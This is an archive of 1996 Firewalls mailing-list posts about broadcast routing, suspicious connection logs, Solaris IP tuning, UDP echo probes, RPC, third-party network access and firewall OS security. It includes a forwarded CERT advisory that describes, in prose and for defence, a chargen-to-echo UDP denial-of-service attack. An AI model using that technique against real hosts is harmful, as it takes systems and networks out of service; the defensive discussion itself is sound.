denver.ssds.com (8.6.9/8.6.9.SSDSnet-hub) with ESMTP id LAA00946; Thu, 8 Feb 1996 11:50:21 -0700 Received: (from mam@localhost) by baltimore.ssds.com (8.6.9/8.6.9.SSDSnet-site) id NAA21664; Thu, 8 Feb 1996 13:50:19 -0500 Date: Thu, 8 Feb 1996 13:50:19 -0500 (EST) From: Mike Malik -- Dover DE X-Sender: mam@baltimore To: Mark Newton cc: firewalls@GreatCircle.COM Subject: Re: The "ULTIMATELY secure firewall" web page In-Reply-To: <199602081110.VAA06734@cleese.apana.org.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I think Macrus moved all this to V-One ? Mike ( ( | ( Mike Malik (mam@ssds.com) ) ) (| ), inc. 9841 Broken Land Parkway,Suite 100 business driven Columbia, MD 21046 technology solutions 410-381-4313 FAX: 410-381-2170 On Thu, 8 Feb 1996, Mark Newton wrote: > Date: Thu, 8 Feb 1996 21:40:07 +1030 (CST) > From: Mark Newton > To: firewalls@GreatCircle.COM > Subject: The "ULTIMATELY secure firewall" web page > > > I have a need to point out some network security problems to an > acquaintance, and thought it'd be effective if I illustrated some > of them my pointing him at "The ULTIMATELY secure firewall" page > on http://www.iwi.com/pubs/A1firewall.htm. > > Unfortunately, it seems to have disappeared :-( > > Can anyone offer me a pointer to the page? > > Thanks in advance, > > - mark > > -------------------------------------------------------------------- > I tried an internal modem, newton@cleese.apana.org.au > but it hurt when I walked. Mark Newton > ----- Voice: +61-8-3732429 --------------- Data: +61-8-3736006 ----- > From firewalls-owner Thu Feb 8 11:24:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA09815 for firewalls-outgoing; Thu, 8 Feb 1996 11:17:57 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA09810 for ; Thu, 8 Feb 1996 11:17:52 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-960123) id LAA25339; Thu, 8 Feb 1996 11:14:17 -0800 Received: from ford.gbnet.org(192.188.96.10) by mycroft via smap (V1.3mjr) id sma025313; Thu Feb 8 11:13:35 1996 Received: (from steve@localhost) by ford.gbnet.org (8.7.1/8.6.12) id TAA23351; Thu, 8 Feb 1996 19:12:49 GMT From: Steve Kennedy Message-Id: <199602081912.TAA23351@ford.gbnet.org> Subject: Re: Global broadcasts To: firewalls@bifroest.demon.co.uk (Ian Miller) Date: Thu, 8 Feb 1996 19:12:48 +0000 (GMT) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Ian Miller" at Feb 8, 96 00:01:33 am X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to Ian Miller > I recently noticed an NFS client program doing a global UDP broadcast (i.e. > broadcasting to 255.255.255.255) to port 111. I saw it because our > firewall logged it when it blocked the packet. However, it made me wonder > how far it would have got if the firewall hadn't stopped it. (It had a TTL > of 60 so it was not self limiting.) Do back-bone and ISP routers block such > global traffic? If not, why aren't we swamped by it? > Whatever your ISP does it struck as a classic example of where the firewall > should protecting the Internet from the private network. broadcasts should NOT be routed !!! However it is possible to configure some routers to pass specific broadcasts (such as bootp requests). This should generally only be done if absolutely necessary as it can add a heavy processing load on the router. Regards Steve -- home steve@gbnet.org * Flat 2, 43 Howitt Road, Belsize Pk, London NW3 4LU work steve@demon.net * tel +44-(0)171 483 1169 FAX +44-(0)181 444 6103 www http://www.gbnet.net/ * bits steve@gbnet.net * Orange mobile +44-(0)973 600050 Euro firewall info - send mail to majordomo@gbnet.net (subscribe firewalls-uk) From firewalls-owner Thu Feb 8 11:39:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA10451 for firewalls-outgoing; Thu, 8 Feb 1996 11:29:08 -0800 (PST) Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA10444 for ; Thu, 8 Feb 1996 11:29:02 -0800 (PST) Received: from maestro.Maestro.COM by relay4.UU.NET with SMTP id QQacbl29945; Thu, 8 Feb 1996 14:28:29 -0500 (EST) Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA04179; Thu, 8 Feb 96 14:17:37 EST Date: Thu, 8 Feb 1996 14:17:36 -0500 (EST) From: Sick Puppy To: firewalls@GreatCircle.com Subject: Hoo Dat? Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk These two d00ds crossed my sniffer after they came out from bbnplanet.net which they passed through on their way to their target, which appears to have been a firewall. Anyone got any idea who they are, or what they are up to? Date/time Port Protocol Origin IP address Feb 7 05:21:02 4137 tcp 203.241.159.118 Feb 7 05:21:31 4137 tcp 203.241.159.118 Feb 7 05:43:42 4243 tcp 203.241.159.118 Feb 7 05:44:11 4243 tcp 203.241.159.118 Feb 7 06:17:15 4379 tcp 203.241.159.118 Feb 7 06:17:45 4379 tcp 203.241.159.118 Feb 7 06:42:20 4474 tcp 203.241.159.118 Feb 7 06:42:25 4474 tcp 203.241.159.118 Feb 7 06:42:26 4474 tcp 203.241.159.118 Feb 7 06:42:49 4474 tcp 203.241.159.118 Feb 8 00:03:32 3708 tcp 203.241.163.77 Feb 8 00:04:02 3708 tcp 203.241.163.77 Feb 8 00:32:18 3798 tcp 203.241.163.77 Feb 8 00:32:47 3798 tcp 203.241.163.77 Feb 8 00:32:48 3798 tcp 203.241.163.77 Feb 8 00:45:33 3837 tcp 203.241.163.77 Feb 8 00:45:39 3837 tcp 203.241.163.77 Feb 8 00:46:03 3837 tcp 203.241.163.77 Feb 8 01:05:19 3896 tcp 203.241.163.77 Feb 8 01:05:20 3896 tcp 203.241.163.77 SP, tCED cDm From firewalls-owner Thu Feb 8 11:53:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA10999 for firewalls-outgoing; Thu, 8 Feb 1996 11:36:05 -0800 (PST) Received: from usia.gov (XGATE.USIA.GOV [198.67.64.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA10994 for ; Thu, 8 Feb 1996 11:36:01 -0800 (PST) Received: from NetWare MHS (SMF70) by usia.gov via Connect2-SMTP 4.00; Thu, 8 Feb 96 14:36:01 -0500 Message-ID: <614F1A310136C8D1@usia.gov> In-Reply-To: Date: Thu, 8 Feb 96 14:31:24 -0500 From: "Lehrer, Neil" Organization: USIA To: firewalls@greatcircle.com Subject: Re: Firewalls-Digest V5 #90 X-mailer: Connect2-SMTP 4.00 MHS to SMTP Gateway Sender: firewalls-owner@GreatCircle.COM Precedence: bulk i seem to be getting digests from 2 different sources, the volume numbering is different and one does have a table of contents. does anyone know what is going on? do i have to fix anything? thanks. ``````````````````````````````````````````````````````````````````` Return-Path: Received: from relay2.UU.NET by usia.gov via Connect2-SMTP 4.00 (00000A3); Thu, 8 Feb 96 14:04:31 -0500 Received: from miles.greatcircle.com by relay2.UU.NET with ESMTP id QQacbi24291; Thu, 8 Feb 1996 13:38:48 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA02123 for firewalls-digest-outgoing; Thu, 8 Feb 1996 09:03:09 -0800 (PST) Date: Thu, 8 Feb 1996 09:03:09 -0800 (PST) Message-Id: <199602081703.JAA02123@miles.greatcircle.com> From: owner-firewalls-digest@uunet.uu.net To: firewalls-digest@GreatCircle.COM Subject: firewalls-digest V1 #1 Reply-To: firewalls@GreatCircle.COM Errors-To: owner-firewalls-digest@uunet.uu.net Precedence: bulk To: firewalls-digest@GreatCircle.COM From: owner-firewalls-digest@uunet.uu.net Reply-To: firewalls@GreatCircle.COM `````````````````````````````````````````````````````````````````````````` `````````````````` To: FIREWALL @ XGATE {firewalls-digest@GreatCircle.COM} From: Firewalls Subject: Firewalls-Digest V5 #90 Date: 2/7/96 Time: 7:56PM Return-Path: Received: from relay3.UU.NET by usia.gov via Connect2-SMTP 4.00 (00000A3); Wed, 7 Feb 96 20:37:12 -0500 Received: from miles.greatcircle.com by relay3.UU.NET with ESMTP id QQabys00868; Wed, 7 Feb 1996 20:31:06 -0500 (EST) From: firewalls-digest-owner@GreatCircle.COM Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA13408 for firewalls-digest-outgoing; Wed, 7 Feb 1996 16:56:03 -0800 (PST) Date: Wed, 7 Feb 1996 16:56:03 -0800 (PST) Message-Id: <199602080056.QAA13408@miles.greatcircle.com> To: firewalls-digest@GreatCircle.COM Subject: Firewalls-Digest V5 #90 Reply-To: Firewalls@GreatCircle.COM Errors-To: firewalls-digest-owner@GreatCircle.COM Precedence: bulk Regards Regards +++++++++++++++++++++++++++++++++++++++ + Neil Lehrer + U.S. Information Agency + Networks and Systems Support Division + + voice 202 619-0903 + fax 202 619-3883 + internet nlehrer@usia.gov + + "oh what a tangled net we weave + when we seek to retrieve." + +++++++++++++++++++++++++++++++++++++++ From firewalls-owner Thu Feb 8 12:13:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA12751 for firewalls-outgoing; Thu, 8 Feb 1996 11:58:26 -0800 (PST) Received: from tiete.dcc.unicamp.br (dcc.unicamp.br [143.106.1.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA12649 for ; Thu, 8 Feb 1996 11:57:44 -0800 (PST) Received: from grande (grande.dcc.unicamp.br) by tiete.dcc.unicamp.br (4.1/SMI-4.1) id AA09967; Thu, 8 Feb 96 16:24:57 EDT Received: from negro by grande (SMI-8.6/SMI-SVR4) id QAA00554; Thu, 8 Feb 1996 16:21:47 -0200 Received: by negro (SMI-8.6/SMI-SVR4) id QAA02629; Thu, 8 Feb 1996 16:21:45 -0200 Date: Thu, 8 Feb 1996 16:21:45 -0200 From: Jose Roberto Menezes Monteiro Message-Id: <199602081821.QAA02629@negro> To: avalon@coombs.anu.edu.au, dannyc@gmap.leeds.ac.uk Subject: Re: IP kernel variable of Solaris Cc: firewalls@GreatCircle.com X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ----- Begin Included Message ----- From duarte Thu Feb 8 14:55:32 1996 Date: Thu, 8 Feb 1996 14:55:27 -0200 From: Keesje Duarte Pouw To: monteiro@dcc.unicamp.br Subject: Re: IP kernel variable of Solaris Cc: duarte Well, thanks for all the replies, but what really needs is more information about IP kernel parameters than just what ndd /dev/ip gives ... dannyc@gmap.leeds.ac.uk writes: > ndd /dev/ip \? > > You will get a list of all the IP kernel parameters which can be set, using > the ndd utility, e.g. > turns off ip_forwarding. If this is particularly what you are doing, > then don't forget to switch off ip_forward_directed_broadcasts and > ip_forward_src_routed too. As written some parameters are straight forward like ip_forwarding but some gives me some doubt: Is *ip_ignore_redirect* to set the host to ignore ICMP redirect messages? I guess so. But some are meaningless to me! :(. For instance *ip_wroff_extra* what is it good for? Any way I am looking for some reference that will give me more information about *all* the parameters not just a list of it. :) TIA ----- End Included Message ----- From firewalls-owner Thu Feb 8 12:15:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA11570 for firewalls-outgoing; Thu, 8 Feb 1996 11:42:11 -0800 (PST) Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA11501 for ; Thu, 8 Feb 1996 11:41:53 -0800 (PST) Received: from pm2-22.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA28511; Thu, 8 Feb 96 14:39:44 -0500 Date: Thu, 8 Feb 96 14:39:44 -0500 Message-Id: <9602081939.AA28511@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: brian@ilinx.bctel.net, brian_murrell@bctel.net From: Frank Willoughby Subject: Re: anybody know of any vulnerabilities with "echo" Cc: firewalls@GreatCircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 02:10 PM 2/4/96 -0800, brian murrel allegedly wrote: >Hi Folks, > > At a particular Internet firewall I administer, I've noticed a rash of >"echo" (udp port 7) service attempts. These came on pretty suddenly (as if >a whole shwack of people found something out) and are pretty constant now. > > I'm wondering if a new vulnerablity with the (a particular implementation >maybe) echo server has been found. Anybody else notice this trend?? > >b. > > >-- >Brian J. Murrell brian@ilinx.com >InterLinx Support Services, Inc. brian@wimsey.com >North Vancouver, B.C. 604 983 UNIX > Platform and Brand Independent UNIX Support - R3.2 - R4 - BSD One possible cause of your problems may be undesired company as mentioned in the latest CERT Advisory 96.01 - UDP Port Denial-of-Service Attack If you already have this, please feel free to hit the key now. Best Regards, Frank http://www.fortified.com/fortified [most of the headers were removed for brevity] From: CERT Advisory To: cert-advisory@cert.org Subject: CERT Advisory CA-96.01 - UDP Port Denial-of-Service Attack Reply-To: cert-advisory-request@cert.org Organization: CERT(sm) Coordination Center - +1 412-268-7090 X-UIDL: 823806055.043 ============================================================================= CERT(sm) Advisory CA-96.01 February 8, 1996 Topic: UDP Port Denial-of-Service Attack ----------------------------------------------------------------------------- The CERT Coordination Center has received reports of programs that launch denial-of-service attacks by creating a "UDP packet storm" either on a system or between two systems. An attack on one host causes that host to perform poorly. An attack between two hosts can cause extreme network congestion in addition to adversely affecting host performance. The CERT staff recommends disabling unneeded UDP services on each host, in particular the chargen and echo services, and filtering these services at the firewall or Internet gateway. Because the UDP port denial-of-service attacks typically involve IP spoofing, we encourage you to follow the recommendations in advisory CA-95:01 and CA-95:01.README. As we receive additional information relating to this advisory, we will place it in ftp://info.cert.org/pub/cert_advisories/CA-96.01.README We encourage you to check our README files regularly for updates on advisories that relate to your site. ----------------------------------------------------------------------------- I. Description When a connection is established between two UDP services, each of which produces output, these two services can produce a very high number of packets that can lead to a denial of service on the machine(s) where the services are offered. Anyone with network connectivity can launch an attack; no account access is needed. For example, by connecting a host's chargen service to the echo service on the same or another machine, all affected machines may be effectively taken out of service because of the excessively high number of packets produced. In addition, if two or more hosts are so connected, the intervening network may also become congested and deny service to all hosts whose traffic traverses that network. II. Impact Anyone with network connectivity can cause a denial of service. This attack does not enable them to gain additional access. III. Solution We recommend taking all the steps described below. 1. Disable and filter chargen and echo services. This attack is most readily exploited using the chargen or echo services, neither of which is generally needed as far as we are aware. We recommend that you disable both services on the host and filter them at the firewall or Internet gateway. To disable these services on a host, it is necessary to edit the inetd configuration file and cause inetd to begin using the new configuration. Exactly how to do this is system dependent so you should check your vendor's documentation for inetd(8); but on many UNIX systems the steps will be as follows: (1) Edit the inetd configuration file (e.g. /etc/inetd.conf). (2) Comment out the echo, chargen, and other UDP services not used. (3) Cause the inetd process to reread the configuration file (e.g., by sending it a HUP signal). 2. Disable and filter other unused UDP services. To protect against similar attacks against other services, we recommend - disabling all unused UDP services on hosts and - blocking at firewalls all UDP ports less than 900 with the exception of specific services you require, such as DNS (port 53). 3. If you must provide external access to some UDP services, consider using a proxy mechanism to protect that service from misuse. Techniques to do this are discussed in Chapter 8, "Configuring Internet Services," in _Building Internet Firewalls_ by Chapman and Zwicky (see Section IV below). 4. Monitor your network. If you do provide external UDP services, we recommend monitoring your network to learn which systems are using these services and to monitor for signs of misuse. Tools for doing so include Argus, tcpdump, and netlog. Argus is available from ftp://lancaster.andrew.cmu.edu/pub/argus-1.5/argus-1.5.tar.gz MD5 (argus-1.5.tar.gz) = 9c7052fb1742f9f6232a890267c03f3c Note that Argus requires the TCP wrappers to install: ftp://info.cert.org/pub/tools/tcp_wrappers/tcp_wrappers_7.2.tar.Z MD5 (tcp_wrappers_7.2.tar.Z) = 883d00cbd2dedd9bfc783b7065740e74 tcpdump is available from ftp://ftp.ee.lbl.gov/tcpdump-3.0.2.tar.Z MD5 (tcpdump-3.0.2.tar.Z) = c757608d5823aa68e4061ebd4753e591 Note that tcpdump requires libpcap, available at ftp://ftp.ee.lbl.gov/libpcap-0.0.6.tar.Z MD5 (libpcap-0.0.6.tar.Z) = cda0980f786932a7e2eebfb2641aa7a0 netlog is available from ftp://net.tamu.edu/pub/security/TAMU/netlog-1.2.tar.gz MD5 (netlog-1.2.tar.gz) = 1dd62e7e96192456e8c75047c38e994b 5. Take steps against IP spoofing. Because IP spoofing is typically involved in UDP port denial-of-service attacks, we encourage you to follow the guidance in advisory CA-95:01 and CA-95:01.README, available from ftp://info.cert.org/pub/cert_advisories/CA-95:01.IP.spoofing ftp://info.cert.org/pub/cert_advisories/CA-95:01.README IV. Sources of further information about packet filtering For a general packet-filtering recommendations, see ftp://info.cert.org/pub/tech_tips/packet_filtering For in-depth discussions of how to configure your firewall, see _Firewalls and Internet Security: Repelling the Wily Hacker_ William R. Cheswick and Steven M. Bellovin Addison-Wesley Publishing Company, 1994 ISBN 0-201-63357 _Building Internet Firewalls_ Brent Chapman and Elizabeth D. Zwicky O'Reilly & Associates, Inc., 1995 ISBN 1-56592-124-0 --------------------------------------------------------------------------- The CERT Coordination Center staff thanks Peter D. Skopp of Columbia University for reporting the vulnerability and Steve Bellovin of AT&T Bell Labs for his support in responding to this problem. --------------------------------------------------------------------------- If you believe that your system has been compromised, contact the CERT Coordination Center or your representative in the Forum of Incident Response and Security Teams (FIRST). We strongly urge you to encrypt any sensitive information you send by email. The CERT Coordination Center can support a shared DES key and PGP. Contact the CERT staff for more information. Location of CERT PGP key ftp://info.cert.org/pub/CERT_PGP.key CERT Contact Information ------------------------ Email cert@cert.org Phone +1 412-268-7090 (24-hour hotline) CERT personnel answer 8:30-5:00 p.m. EST (GMT-5)/EDT(GMT-4), and are on call for emergencies during other hours. Fax +1 412-268-6989 Postal address CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 USA To be added to our mailing list for CERT advisories and bulletins, send your email address to cert-advisory-request@cert.org CERT publications, information about FIRST representatives, and other security-related information are available for anonymous FTP from ftp://info.cert.org/pub/ CERT advisories and bulletins are also posted on the USENET newsgroup comp.security.announce Copyright 1996 Carnegie Mellon University This material may be reproduced and distributed without permission provided it is used for noncommercial purposes and the copyright statement is included. CERT is a service mark of Carnegie Mellon University. From firewalls-owner Thu Feb 8 12:19:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA10744 for firewalls-outgoing; Thu, 8 Feb 1996 11:33:08 -0800 (PST) Received: from usia.gov (XGATE.USIA.GOV [198.67.64.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA10724 for ; Thu, 8 Feb 1996 11:33:00 -0800 (PST) Received: from NetWare MHS (SMF70) by usia.gov via Connect2-SMTP 4.00; Thu, 8 Feb 96 14:33:01 -0500 Message-ID: <604F1A310136C8D1@usia.gov> In-Reply-To: Date: Thu, 8 Feb 96 14:30:35 -0500 From: "Lehrer, Neil" Organization: USIA To: firewalls@greatcircle.com Subject: Re: firewalls-digest V1 #1 X-mailer: Connect2-SMTP 4.00 MHS to SMTP Gateway Sender: firewalls-owner@GreatCircle.COM Precedence: bulk i seem to be getting digests from 2 different sources, the volume numbering is different and one does have a table of contents. does anyone know what is going on? do i have to fix anything? thanks. ``````````````````````````````````````````````````````````````````` Return-Path: Received: from relay2.UU.NET by usia.gov via Connect2-SMTP 4.00 (00000A3); Thu, 8 Feb 96 14:04:31 -0500 Received: from miles.greatcircle.com by relay2.UU.NET with ESMTP id QQacbi24291; Thu, 8 Feb 1996 13:38:48 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA02123 for firewalls-digest-outgoing; Thu, 8 Feb 1996 09:03:09 -0800 (PST) Date: Thu, 8 Feb 1996 09:03:09 -0800 (PST) Message-Id: <199602081703.JAA02123@miles.greatcircle.com> From: owner-firewalls-digest@uunet.uu.net To: firewalls-digest@GreatCircle.COM Subject: firewalls-digest V1 #1 Reply-To: firewalls@GreatCircle.COM Errors-To: owner-firewalls-digest@uunet.uu.net Precedence: bulk To: firewalls-digest@GreatCircle.COM From: owner-firewalls-digest@uunet.uu.net Reply-To: firewalls@GreatCircle.COM `````````````````````````````````````````````````````````````````````````` `````````````````` To: FIREWALL @ XGATE {firewalls-digest@GreatCircle.COM} From: Firewalls Subject: Firewalls-Digest V5 #90 Date: 2/7/96 Time: 7:56PM Return-Path: Received: from relay3.UU.NET by usia.gov via Connect2-SMTP 4.00 (00000A3); Wed, 7 Feb 96 20:37:12 -0500 Received: from miles.greatcircle.com by relay3.UU.NET with ESMTP id QQabys00868; Wed, 7 Feb 1996 20:31:06 -0500 (EST) From: firewalls-digest-owner@GreatCircle.COM Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA13408 for firewalls-digest-outgoing; Wed, 7 Feb 1996 16:56:03 -0800 (PST) Date: Wed, 7 Feb 1996 16:56:03 -0800 (PST) Message-Id: <199602080056.QAA13408@miles.greatcircle.com> To: firewalls-digest@GreatCircle.COM Subject: Firewalls-Digest V5 #90 Reply-To: Firewalls@GreatCircle.COM Errors-To: firewalls-digest-owner@GreatCircle.COM Precedence: bulk Regards +++++++++++++++++++++++++++++++++++++++ + Neil Lehrer + U.S. Information Agency + Networks and Systems Support Division + + voice 202 619-0903 + fax 202 619-3883 + internet nlehrer@usia.gov + + "oh what a tangled net we weave + when we seek to retrieve." + +++++++++++++++++++++++++++++++++++++++ From firewalls-owner Thu Feb 8 13:09:13 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA15887 for firewalls-outgoing; Thu, 8 Feb 1996 12:49:02 -0800 (PST) Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id MAA15867 for ; Thu, 8 Feb 1996 12:48:51 -0800 (PST) Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.7.3/8.7.3) with UUCP id OAA23131 for GreatCircle.COM!firewalls; Thu, 8 Feb 1996 14:19:58 -0600 (CST) Received: by ris1.nmti.com (smail2.5) id AA19313; 8 Feb 96 14:19:57 CST (Thu) Received: by sonic.nmti.com; id AA15314; Thu, 8 Feb 1996 13:50:41 -0600 From: peter@nmti.com (Peter da Silva) Message-Id: <9602081950.AA15314@sonic.nmti.com.nmti.com> Subject: Re: Product selection To: jon@london.hcsc.com (Jon Shallow) Date: Thu, 8 Feb 1996 13:50:41 -0600 (CST) Cc: firewalls@GreatCircle.COM In-Reply-To: <9601231435.AA05882@london.csd.harris.com> from "Jon Shallow" at Jan 23, 96 02:35:33 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Assume that sendmail was installed badly, and is still running as a 'root' > process. A 'feature' is found where the incoming mail session is able to > take control. > > This mail session at worst can only corrupt the NETWORK domain, in > particular, only the Virtual Address Space of this mail session. In particular, it can open new network connections (otherwise it can't forward mail!). For example, a proxy TCP connection between phreak.net and exploitable.victim.com. From firewalls-owner Thu Feb 8 13:24:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA17021 for firewalls-outgoing; Thu, 8 Feb 1996 13:16:25 -0800 (PST) Received: from MAIL.STATE.WI.US (mail.state.wi.us [165.189.87.254]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA16989 for ; Thu, 8 Feb 1996 13:16:11 -0800 (PST) From: RUNTERD@MAIL.STATE.WI.US X400-Originator: RUNTERD@MAIL.STATE.WI.US X400-Recipients: firewalls@greatcircle.com X400-MTS-Identifier: [/PRMD=WISTGOV/ADMD=ATTMAIL/C=US/;0003800002791273000004] X400-Content-Type: P2-1988 (22) Message-ID: <0003800002791273000004*@MHS> To: "firewalls(a)greatcircle.com" Subject: RPC through a firewall Date: Thu, 8 Feb 1996 15:16:29 -0600 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tuesday Feb 6,1996, Jas (Matthew K) wrote --- .... RPC can be secured, and quite >easily at that _if_ you know wht you are doing... punching it through >a firewall can be difficult, but you can get RPC to do things like a) >force it to use one and only one port, b) force it to use only TCP, c) >turn on authentification, and fold in encryption. > >***Matt > >p.s. i have no qualms in saying that some of the current >implementations of RPC servers are insecure (like NFS if not done >with SecureNFS or with kerberos).. This may be slightly off topic from pure firewalls discussion and I apologize but I may also be in a position where I will be asked to allow RPC through a firewall. Sessions would be from a variety of platforms to a protected MVS host. I am able to address Matts' points A, B, and C (authentication only) but I have come up empty in a search for _interactive_ session encryption products that run on an MVS host. Link level encryption is recognized as the only current option . Any suggestions? Thanks all. Bob Runte - NMB State of Wi - Dept of Admin From firewalls-owner Thu Feb 8 14:09:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA18879 for firewalls-outgoing; Thu, 8 Feb 1996 14:00:53 -0800 (PST) Received: from proton.llumc.edu (proton.llumc.edu [143.197.200.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA18873 for ; Thu, 8 Feb 1996 14:00:46 -0800 (PST) Received: from mycroft.llumc.edu (mycroft.llumc.edu [143.197.200.18]) by proton.llumc.edu (8.6.9/8.6.9) with SMTP id OAA16348; Thu, 8 Feb 1996 14:02:58 -0800 Date: Thu, 8 Feb 1996 13:52:27 -0800 (PST) From: Michael Baumann To: "Jason L. Haar" cc: brian@ilinx.bctel.net, brian_murrell@bctel.net, firewalls@GreatCircle.COM Subject: Re: anybody know of any vulnerabilities with "echo" In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 8 Feb 1996, Jason L. Haar wrote: > > > > I'm wondering if a new vulnerablity with the (a particular implementation > > maybe) echo server has been found. Anybody else notice this trend?? > > > > I wonder, this smells heavily of the "Harverst cache Web server". > Harvest uses some pretty wild checks on upstream web sites to see if > they're up or not - the default is to "ping" the host using UDP echo > packets - that could be what you're seeing. > > Of course, it goes without saying that such sites shouldn't set up such > things without ASKING those sites first... I kinda doubt it.. it seems like most of the packets that I have seen are coming from PPP accounts. [ Why am I not suprised?] -- Michael Baumann Electus Technology Inc. / Loma Linda University Medical Center San Bernardino, California. (909)799-8308 |Internet: baumann@llumc.edu From firewalls-owner Thu Feb 8 14:39:46 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA19896 for firewalls-outgoing; Thu, 8 Feb 1996 14:33:19 -0800 (PST) Received: from relay5.UU.NET (relay5.UU.NET [192.48.96.15]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA19891 for ; Thu, 8 Feb 1996 14:33:14 -0800 (PST) From: Dick_Wall@stratus.com Received: from na.stratus.com by relay5.UU.NET with SMTP id QQacby09107; Thu, 8 Feb 1996 17:31:41 -0500 (EST) Received: from by na.stratus.com with SMTP (1.38.193.5/16.2) id AA20982; Thu, 8 Feb 1996 17:27:58 -0500 X-Openmail-Hops: 1 Date: Thu, 8 Feb 96 17:27:26 -0500 Message-Id: Subject: Non-company Access ?? Mime-Version: 1.0 To: firewalls@greatcircle.com Content-Type: text/plain; charset=US-ASCII; name="Message text" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In a few words .. can anyone tell me how your companies handle requests for third party access to your networks ? I get frequent requests to provide PPP or SLIP access to contractors, vendors, resellers, distributors, etc. for the purpose of accessing all sorts of applications and data bases. I also get requests to "open a hole in the firewall" to allow these folks to access our facilities. We don't "open holes", but we do register dial access accounts. (Too many of them to make me feel comfortable). Generally, we can't restrict acces on a machine basis. The requests typically are for access to a broad base of systems. Furthermore, once they are on those systems, they are free to then access other machines that the filters won't catch. What do you all do ?? Do you allow non-company access ? Do you move all the systems to be accessed to a secure LAN ? If you allow compnay A to connect to you, how do you prevent company B (which happens to be connected behind company A) from logging onto the "A" machine and passing into your net ? (The ususal response I get on this one is "trust" company A ... they won't let company B do that .. ) All input is appreciated ... Dick From firewalls-owner Thu Feb 8 15:36:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA19315 for firewalls-outgoing; Thu, 8 Feb 1996 14:10:40 -0800 (PST) Received: from xroads.vthrc.uq.edu.au (xroads.vthrc.uq.edu.au [130.102.4.16]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA19294 for ; Thu, 8 Feb 1996 14:10:29 -0800 (PST) Received: (from root@localhost) by xroads.vthrc.uq.edu.au (8.7.3/8.7.3) id IAA17936 for ; Fri, 9 Feb 1996 08:06:05 +1000 (EST) Received: from arundel.vthrc.uq.edu.au(130.102.4.21) by xroads.vthrc.uq.edu.au via smap (V1.3) id sma017934; Fri Feb 9 08:06:02 1996 Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 9 Feb 1996 08:08:49 +1000 To: firewalls@GreatCircle.COM (firewalls) From: D.Thomas@vthrc.uq.edu.au (Danny Thomas) Subject: Re: Most Secure Unix? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Rolf Weber replies >> I think perhaps my point wasn't made clearly. The firewall can >> only be as good as the OS on which it exists. If your firewall >> is an application on top of an OS, I can break the firewall by >> breaking the OS. >> >i never heard of any breakin possible because of a kernel bug. >may be i'm wrong, may be it's possible, but i cannot imagine. Surely at least some of the patches released by Sun etc 